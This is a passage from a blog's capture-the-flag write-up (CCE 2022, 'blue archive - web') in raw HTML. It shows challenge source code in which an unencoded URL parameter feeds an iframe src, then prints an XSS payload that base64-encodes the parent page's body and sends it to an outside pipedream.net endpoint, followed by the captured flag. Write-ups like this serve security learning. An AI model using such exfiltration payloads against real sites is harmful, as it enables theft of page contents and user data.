language_">console</span>.<span class="title function_">log</span>(e)</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">500</span>).<span class="title function_">render</span>(<span class="string">&#x27;index&#x27;</span>, &#123; error : <span class="string">&#x27;Oops, an unknown error has occured.&#x27;</span> &#125;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// /app/route/routes.js</span></span><br></pre></td></tr></table></figure>
<p>The saveArchive() function is called when creating an archive.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> express = <span class="built_in">require</span>(<span class="string">&#x27;express&#x27;</span>)</span><br><span class="line"><span class="keyword">const</span> &#123; encode &#125; = <span class="built_in">require</span>(<span class="string">&quot;html-entities&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> app = <span class="title function_">express</span>()</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;/&#x27;</span>, <span class="keyword">function</span> (<span class="params">req, res</span>) &#123;</span><br><span class="line">    data = <span class="string">`&lt;html&gt;</span></span><br><span class="line"><span class="string">&lt;head&gt;&lt;title&gt;sandbox&lt;/title&gt;&lt;/head&gt;</span></span><br><span class="line"><span class="string">&lt;body&gt;</span></span><br><span class="line"><span class="string">&lt;script&gt;</span></span><br><span class="line"><span class="string">FLAG = &quot;cce2022&#123;this_is_not_real_flag&#125;&quot;</span></span><br><span class="line"><span class="string">&lt;/script&gt;</span></span><br><span class="line"><span class="string">&lt;iframe src=&quot;<span class="subst">$&#123;encode(req.query.url)&#125;</span>&quot; style=&quot;width: 100%; height: 100%; border: 0&quot;&gt;&lt;/iframe&gt;</span></span><br><span class="line"><span class="string">&lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;`</span></span><br><span class="line">    res.<span class="title function_">setHeader</span>(<span class="string">&quot;Content-Type&quot;</span>,<span class="string">&quot;text/html&quot;</span>).<span class="title function_">send</span>(data);</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(process.<span class="property">env</span>.<span class="property">PORT</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// /sandbox/src/index.js</span></span><br></pre></td></tr></table></figure>
<p>When I checked the code of &#x2F;sandbox&#x2F;src&#x2F;index.js, I could see that there was a FLAG in the Dom. And it gets the value of the url parameter from the iframe part and passes it as the value of src as it is. We can trigger XSS because we can manipulate the value of src at will.<br><img src='https://imgur.com/WlcrFK1.png'></p>
<p>The structure of the dome is as above. The vulnerability occurs in Iframes. But the flag is in Parent Dom.</p>
<p><img src="https://cdn.discordapp.com/attachments/966582609377361920/1023369845242347611/2022-09-25_08.06.17.png"></p>
<p>So we must read the value of window.parent.document.body. If the value of document.body is read, the document of the only iframe is read.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://sandbox.bluearchive.kr:31337/?url=javascript:location.href=%2527https://79a9bb50560aa2c77156e03b431dc2b3.m.pipedream.net/%2527%252Bbtoa(window.parent.document.body.innerHTML)</span><br></pre></td></tr></table></figure>
<p>We can get the flags by sending the above payload to the archive creation logic</p>
<p><img src="https://cdn.discordapp.com/attachments/966582609377361920/1023371633534181396/2022-09-25_08.13.21.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cce2022&#123;65f6d035ca6640b9ac8e19ff725a747f&#125;</span><br></pre></td></tr></table></figure>
      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2022/08/23/2022-08-23-SSTF/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2022-09-25 04:00:53
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/11/19/2022-11-19-Logic-req.query/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#reborn-of-php"><span class="toc-text">reborn of php</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#BabyWeb"><span class="toc-text">BabyWeb</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#blue-archive-web"><span class="toc-text">blue archive - web</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/P0cas">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        Copyright © 2023 Pocas
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        


        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + CCE%202022%20Write%20Up + '&url=' + https%3A%2F%2Fblog.pocas.kr%2F2022%2F09%2F25%2F2022-09-25-CCE%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://blog.pocas.kr/2022/09/25/2022-09-25-CCE/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
